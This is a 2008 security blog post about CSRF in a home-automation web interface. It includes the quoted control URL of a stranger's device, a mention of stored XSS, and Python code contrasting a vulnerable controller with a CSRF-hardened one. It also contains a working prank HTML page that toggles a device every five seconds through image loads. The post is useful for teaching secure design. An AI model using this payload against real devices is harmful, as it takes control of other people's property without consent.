deep inside: security and tools

Every-day's CSRF: Sorry, I turned off your christmas tree lights

Today, a friend of mine was really proud to show me the home automation installation he just bought. Since he lives in France and I am in DC, he showed me the web interface that controls the lights and other devices in his house. As he only wanted to test this domotic (home automation) system so far, the only thing he had plugged into it was his Christmas tree lights.

The interface switches a device with nothing more than a GET request to a predictable URL, so it was easy to make the tree blink with a simple script, which I showed him: every 5 seconds, it flipped the state.

Anyway, this CSRF is not a big deal for him: it's only the Christmas tree lights, it's only a temporary installation and, well, it's fun. But after a simple Google search I found another installation like my friend's. The URL Google returned is:

http://XXX.XXX.XXX.XXX:88/control_exe.htm;3;1;ON

which basically turns some device on (the trailing path segments look like a device number, an output number and the requested state)... :)

Not only does this application have tons of CSRF, it also has a nice stored XSS that lets you do whatever you want with it! And by the way, since Google's robot indexed this URL, every time it crawls the website (or at least reaches that particular URL) it sets the device ON :) That is the real lesson: a state change behind a plain GET needs no attacker at all, any crawler that follows the link triggers it, and a deliberate CSRF page only has to load the same URL in an <img> tag.
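To make the blinking script and the crawler effect concrete, here is an added example (my own toy model, not the vendor's firmware and not the original script): a simulated control endpoint in its vulnerable form, where a bare GET to control_exe.htm;<device>;<output>;<ON|OFF> flips the relay, beside a hardened form that accepts a state change only over POST from a logged-in session carrying a matching CSRF token, plus the prank page that alternates ON and OFF every 5 seconds. The meaning of the numeric path segments, the session and token scheme, the 192.0.2.10 address and every name in the code are assumptions for illustration.

```python
# Added example, not the device's real code. The URL layout
# control_exe.htm;<device>;<output>;<ON|OFF> is assumed from the path seen above.
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def parse_control_command(path):
    """Parse '/control_exe.htm;3;1;ON' into (device, output, state).

    Returns None for anything that is not a well-formed control command.
    """
    parts = path.split(";")
    if len(parts) != 4 or parts[0] != "/control_exe.htm":
        return None
    device, output, state = parts[1], parts[2], parts[3].upper()
    if not (device.isdigit() and output.isdigit()) or state not in ("ON", "OFF"):
        return None
    return int(device), int(output), state


class VulnerableController:
    """Any GET naming a command flips the relay: no login, no token, no POST."""

    def __init__(self):
        self.state = {}

    def handle(self, req):
        cmd = parse_control_command(req.path)
        if cmd is None:
            return 404, "not found"
        device, output, state = cmd
        self.state[(device, output)] = state  # side effect on a GET: the bug
        return 200, f"device {device} output {output} {state}"


class HardenedController:
    """State changes need POST, a known session cookie and a matching CSRF token."""

    def __init__(self):
        self.state = {}
        self.sessions = {}  # assumed scheme: session id -> per-session CSRF token

    def login(self):
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = secrets.token_urlsafe(16)
        return sid

    def csrf_token(self, sid):
        return self.sessions[sid]

    def handle(self, req):
        cmd = parse_control_command(req.path)
        if cmd is None:
            return 404, "not found"
        if req.method != "POST":
            # GET stays side-effect free, so a crawler or an <img> load does nothing.
            return 405, "method not allowed"
        token = self.sessions.get(req.cookies.get("session"))
        if token is None:
            return 401, "login required"
        supplied = req.form.get("csrf", "")
        if not hmac.compare_digest(token.encode(), supplied.encode()):
            return 403, "bad csrf token"
        device, output, state = cmd
        self.state[(device, output)] = state
        return 200, f"device {device} output {output} {state}"


def crawler_visit(controller, url_path):
    """Simulate Googlebot, or an <img src=...> on a prank page: a bare GET."""
    return controller.handle(Request("GET", url_path))


def blink_page_html(base_url, device=3, output=1, period_ms=5000):
    """Prank page reproducing the 'blink every 5 seconds' idea: each timer tick
    loads the next command URL as an image from the visitor's browser. This only
    works against the vulnerable controller; the hardened one refuses the GETs."""
    url = f"{base_url}/control_exe.htm;{device};{output};"
    return f"""<html><body><script>
var on = false;
setInterval(function () {{
  on = !on;
  new Image().src = "{url}" + (on ? "ON" : "OFF");
}}, {period_ms});
</script></body></html>"""


if __name__ == "__main__":
    # Constructed address (TEST-NET), standing in for the IP Google returned.
    vuln, hard = VulnerableController(), HardenedController()
    print(crawler_visit(vuln, "/control_exe.htm;3;1;ON"), vuln.state)
    print(crawler_visit(hard, "/control_exe.htm;3;1;ON"), hard.state)
    print(blink_page_html("http://192.0.2.10:88"))
```

The hardened version fixes two separate things the vulnerable one gets wrong: a GET never changes state, so crawlers and image tags are harmless, and a POST is only honoured when it carries a token the attacker's page cannot read, which is what actually stops CSRF once the device has a login at all.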

Web security enters your house, f34rs!

Posted December 2008